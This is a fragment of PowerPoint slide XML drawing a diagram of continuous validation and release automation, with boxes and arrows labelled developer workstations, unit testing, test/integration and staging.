                    <a:pt x="0" y="198628"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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11873865" y="4595012"/>
            <a:ext cx="1624965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7790" marR="5080" indent="-85725">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Contin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="5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2200" spc="-10" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ous  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation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36764" y="2863595"/>
            <a:ext cx="1319783" cy="131826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598907" y="2929127"/>
            <a:ext cx="1304544" cy="130454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39795" y="2929127"/>
            <a:ext cx="1304544" cy="1304544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69740" y="306451"/>
            <a:ext cx="771461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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Paradigms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6020" y="760476"/>
            <a:ext cx="11266932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643376" y="1933193"/>
            <a:ext cx="937450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image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below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ows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aut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mati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contin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ous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lease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par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di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ms.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434082" y="2679445"/>
            <a:ext cx="11790680" cy="4298950"/>
            <a:chOff x="2434082" y="2679445"/>
            <a:chExt cx="11790680" cy="4298950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8398002" y="2692145"/>
              <a:ext cx="2849880" cy="4261485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2849879" h="4261484">
                  <a:moveTo>
                    <a:pt x="2849879" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2849879" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28498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398002" y="2692145"/>
              <a:ext cx="2849880" cy="4261485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2849879" h="4261484">
                  <a:moveTo>
                    <a:pt x="0" y="4261104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2849879" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2849879" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4261104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372850" y="2692145"/>
              <a:ext cx="2851785" cy="4261485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2851784" h="4261484">
                  <a:moveTo>
                    <a:pt x="2851404" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851404" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851404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042398" y="5869813"/>
              <a:ext cx="2558415" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2558415" h="142875">
                  <a:moveTo>
                    <a:pt x="2415540" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2415540" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529941" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429763" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429763" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529738" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415540" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2558415" h="142875">
                  <a:moveTo>
                    <a:pt x="2415540" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415540" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415540" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2558415" h="142875">
                  <a:moveTo>
                    <a:pt x="2529738" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2429763" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429763" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529941" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2558415" y="71500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529738" y="5715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46782" y="2705861"/>
              <a:ext cx="2849880" cy="4259580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2849879" h="4259580">
                  <a:moveTo>
                    <a:pt x="2849880" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4259580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2849880" y="4259580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284988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446782" y="2705861"/>
              <a:ext cx="2849880" cy="4259580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2849879" h="4259580">
                  <a:moveTo>
                    <a:pt x="0" y="4259580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2849880" y="4259580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2849880" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4259580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3179445" y="2757931"/>
            <a:ext cx="138366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61290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45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600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040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528316" y="2679445"/>
            <a:ext cx="10837545" cy="4286885"/>
            <a:chOff x="2528316" y="2679445"/>
            <a:chExt cx="10837545" cy="4286885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82684" y="3432047"/>
              <a:ext cx="1091183" cy="105460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74296" y="3432047"/>
              <a:ext cx="1091184" cy="105460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421630" y="2692145"/>
              <a:ext cx="2851785" cy="4261485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2851784" h="4261484">
                  <a:moveTo>
                    <a:pt x="2851404" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851404" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851404" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EBF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421630" y="2692145"/>
              <a:ext cx="2851785" cy="4261485"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2851784" h="4261484">
                  <a:moveTo>
                    <a:pt x="0" y="4261104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2851404" y="4261104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2851404" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4261104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92595" y="3432047"/>
              <a:ext cx="1091183" cy="105460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38500" y="3361943"/>
              <a:ext cx="684276" cy="68427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19144" y="3361943"/>
              <a:ext cx="684276" cy="68427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28316" y="4158995"/>
              <a:ext cx="685800" cy="6858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08960" y="4158995"/>
              <a:ext cx="685800" cy="6858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47160" y="4158995"/>
              <a:ext cx="685800" cy="6858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27804" y="4158995"/>
              <a:ext cx="685800" cy="68580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082417" y="4046981"/>
              <a:ext cx="1618615" cy="1571625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1618614" h="1571625">
                  <a:moveTo>
                    <a:pt x="142875" y="1428750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85852" y="787908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57277" y="787908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="1571625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135763" y="1442974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="1428750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1618614" h="1571625">
                  <a:moveTo>
                    <a:pt x="856107" y="773430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="798957" y="773430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798957" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770382" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770382" y="773430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713232" y="773430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784733" y="916305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848995" y="787654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856107" y="773430"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1618614" h="1571625">
                  <a:moveTo>
                    <a:pt x="1618107" y="1428750"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1560957" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1561084" y="787908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532509" y="787908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1532382" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475232" y="1428750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1546733" y="1571625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1610995" y="1442974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618107" y="142875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814066" y="5657850"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="734695">
                  <a:moveTo>
                    <a:pt x="495299" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4952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814066" y="5657850"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="734695">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594359" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73456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910078" y="5820917"/>
              <a:ext cx="418465" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="112776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="112776"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="336804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="336804"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="224028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="224028"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="449580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418084" y="449580"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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49524" y="6111239"/>
              <a:ext cx="422148" cy="39623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664458" y="5045201"/>
              <a:ext cx="596265" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="596264" h="734695">
                  <a:moveTo>
                    <a:pt x="496569" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4965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664458" y="5045201"/>
              <a:ext cx="596265" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="596264" h="734695">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496569" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595883" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73456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761994" y="5208269"/>
              <a:ext cx="418465" cy="448309"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="418464" h="448310">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="448310">
                  <a:moveTo>
                    <a:pt x="0" y="111251"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="111251"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="448310">
                  <a:moveTo>
                    <a:pt x="0" y="336803"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="336803"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="448310">
                  <a:moveTo>
                    <a:pt x="0" y="224027"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="224027"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="448310">
                  <a:moveTo>
                    <a:pt x="0" y="448055"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="448055"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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01440" y="5498591"/>
              <a:ext cx="422148" cy="39624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463033" y="5657850"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="734695">
                  <a:moveTo>
                    <a:pt x="495300" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594360" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594360" y="99060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4463033" y="5657850"/>
              <a:ext cx="594360" cy="734695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="594360" h="734695">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495300" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594360" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594360" y="734568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73456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4559045" y="5820917"/>
              <a:ext cx="418465" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="112776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="112776"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="336804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="336804"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="224028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="224028"/>
                  </a:lnTo>
                </a:path>
                <a:path w="418464" h="449579">
                  <a:moveTo>
                    <a:pt x="0" y="449580"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="418083" y="449580"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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98492" y="6111239"/>
              <a:ext cx="422148" cy="396239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2616200" y="6629527"/>
            <a:ext cx="247269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40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Developer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35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600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Workstations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462261" y="6629527"/>
            <a:ext cx="77152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404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Staging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192392" y="5098796"/>
            <a:ext cx="125222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75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85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600" spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing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147561" y="2757931"/>
            <a:ext cx="138366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61290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Developer </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45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600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>stat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040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005829" y="6629527"/>
            <a:ext cx="16814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60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Test/Integration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4746497" y="5611621"/>
            <a:ext cx="4747895" cy="646430"/>
            <a:chOff x="4746497" y="5611621"/>
            <a:chExt cx="4747895" cy="646430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6380225" y="5624321"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="297179" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="469391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356616" y="59436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971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6380225" y="5624321"/>
              <a:ext cx="356870" cy="469900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="356870" h="469900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="297179" y="0"/>
                  </a:lnTo>
